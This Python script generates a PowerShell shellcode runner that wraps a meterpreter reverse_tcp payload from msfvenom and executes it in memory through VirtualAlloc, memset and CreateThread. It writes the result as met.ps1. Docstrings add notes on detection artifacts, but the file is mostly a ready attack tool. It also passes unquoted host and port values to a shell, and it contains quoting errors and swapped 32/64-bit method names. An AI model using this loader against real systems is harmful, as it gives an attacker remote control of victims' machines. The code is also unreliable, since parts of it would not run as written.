#!/usr/bin/env python3
import subprocess
import fire
class PS_meminject(object):
    """Generate a PowerShell in-memory shellcode runner around msfvenom output.

    Both public methods shell out to ``msfvenom`` for a meterpreter
    ``reverse_tcp`` payload in ``-f powershell`` format and pass the raw
    command output to ``__create_script``, which writes ``met.ps1`` into the
    current working directory.  The class is exposed as a CLI through
    ``fire.Fire`` at the bottom of the file.

    Analyst notes: the emitted script is the long-known
    Add-Type / VirtualAlloc / memset / CreateThread loader pattern.  Host
    artifacts are the on-disk ``met.ps1``, the P/Invoke signature strings in
    PowerShell script-block logging, and an RWX allocation followed by a new
    thread inside a PowerShell host process.
    """

    def __create_script(self, code):
        """Write ``met.ps1`` (mode ``w+``, current directory) holding the loader.

        ``code`` is whatever ``subprocess.check_output`` returned, i.e. a
        bytes object; it is embedded with ``str(code)`` and no further
        processing.  The file handle is closed explicitly rather than via a
        context manager.
        """
        f = open("met.ps1", "w+")
        script = ""
        # C# P/Invoke declarations; Add-Type compiles them at runtime below.
        script += "$code = '\n"
        script += "[DllImport("kernel32.dll")]\n"
        script += "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\n\n"
        script += "[DllImport("kernel32.dll")]\n"
        script += "public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\n\n"
        script += "[DllImport(i"msvcrt.dll")]\n"
        script += "public static extern IntPtr memset(IntPtr dest, uint src, uint count);';\n\n"
        # Add-Type -memberDefinition compiles the declarations into a type named Win32Functions.Win32.
        script += "$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;\n"
        script += "[Byte[]];\n"
        # The msfvenom output is appended directly after the assignment.
        script += "[Byte[]] $sc ="
        script += str(code)
        # Allocate at least one page; 0x3000 = MEM_COMMIT|MEM_RESERVE,
        # 0x40 = PAGE_EXECUTE_READWRITE (the RWX allocation detections key on).
        script += "$size = 0x1000;\n"
        script += "if ($sc.Length -gt 0x1000) {$size = $sc.Length};\n"
        script += "$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);\n"
        # Byte-by-byte copy into the allocation via memset.
        script += "for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i),$sc[$i], 1)};\n"
        # Start the thread at the buffer, then sleep forever so the host process stays alive.
        script += "$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };\n"
        f.write(script)
        f.close()

    def met64(self, LHOST, LPORT):
        """Run msfvenom for ``windows/meterpreter/reverse_tcp`` and write ``met.ps1``.

        LHOST and LPORT are spliced into a single shell command string
        (``shell=True``) without quoting, so shell metacharacters in either
        value reach the shell unchanged.  Raises ``CalledProcessError`` if
        msfvenom exits non-zero.
        """
        code = subprocess.check_output(
            "msfvenom -p windows/meterpreter/reverse_tcp LHOST="
            + str(LHOST)
            + " LPORT="
            + str(LPORT)
            + " -f powershell EXITFUNC=thread ",
            shell=True,
        )
        self.__create_script(code)

    def met(self, LHOST, LPORT):
        """Run msfvenom for ``windows/x64/meterpreter/reverse_tcp`` and write ``met.ps1``.

        Same command construction as ``met64``: LHOST and LPORT are
        interpolated into a ``shell=True`` string without quoting.  Raises
        ``CalledProcessError`` if msfvenom exits non-zero.
        """
        code = subprocess.check_output(
            "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST="
            + str(LHOST)
            + " LPORT="
            + str(LPORT)
            + " -f powershell EXITFUNC=thread ",
            shell=True,
        )
        self.__create_script(code)
if __name__ == "__main__":
    # python-fire turns the class into a command-line interface; its methods
    # become subcommands and their parameters become CLI arguments.
    fire.Fire(PS_meminject)